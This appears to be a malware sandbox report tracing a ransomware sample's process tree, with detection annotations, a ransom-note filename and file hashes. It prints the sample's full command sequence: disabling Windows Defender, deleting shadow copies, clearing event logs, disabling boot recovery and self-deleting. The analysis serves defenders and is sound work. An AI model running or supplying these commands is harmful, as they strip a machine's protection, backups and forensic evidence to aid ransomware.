C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1748
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1608
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1788
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1392
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:584
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:520
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1216
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1008
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:836
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:932
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1960
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:364
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1652
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1624
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1712
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1804
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1664
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1596
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1544
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:576
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:468
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1888
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:860
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:780
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1452
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1500
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1496
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1696
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:540
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:268
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1936
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:664
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1568
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1464
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1112
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1060
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:680
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1928
-
-
-
C:\Windows\system32\notepad.exenotepad.exe C:\Djfk_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2496
-
-
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\decoding_data.exe"2⤵
- Deletes itself
PID:2504 -
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2540
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1168
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1776
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1528
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1064
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Djfk_HOW_TO_DECRYPT.txt1⤵
- Opens file in notepad (likely ransom note)
PID:1224
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Djfk_HOW_TO_DECRYPT.txt1⤵
- Opens file in notepad (likely ransom note)
PID:824
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD596ad57ef6f7c434f4642a95f782e1ffa
SHA176b519f4c0d1b998e0c37ff3ffa8dc0024449eaa
SHA256a1e2a8b6650198527b5066285ca32eaa06e583a282fa69511805979bb54560f1
SHA512ba0ca31bc36c0d4e0868906a1f8576e902580286a68b2f137ea89a8c08f11c4d3fbce67e7327514ad0b37b6c3bdb7a6636742be99068bd661eaa70cbe41539c0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD50c4b1977910bcfeabd1330d7ec4e97f2
SHA1d3ce308057a08a26da78ccd3841cdec69586c50a
SHA25604d16504f89db4ad8a9cc67b3c940b42dd6bf37a6e848de348f82f4291226639
SHA512a192d62fe3e186f9c28798bbbe6e01ee31f8dca227642ec57dfab60009e14bcd5cf22faa573305d310bc1abf2250230c74f7f8448bd2ea542e8b129b40d5ed4a
-
Filesize
1KB
MD596ad57ef6f7c434f4642a95f782e1ffa
SHA176b519f4c0d1b998e0c37ff3ffa8dc0024449eaa
SHA256a1e2a8b6650198527b5066285ca32eaa06e583a282fa69511805979bb54560f1
SHA512ba0ca31bc36c0d4e0868906a1f8576e902580286a68b2f137ea89a8c08f11c4d3fbce67e7327514ad0b37b6c3bdb7a6636742be99068bd661eaa70cbe41539c0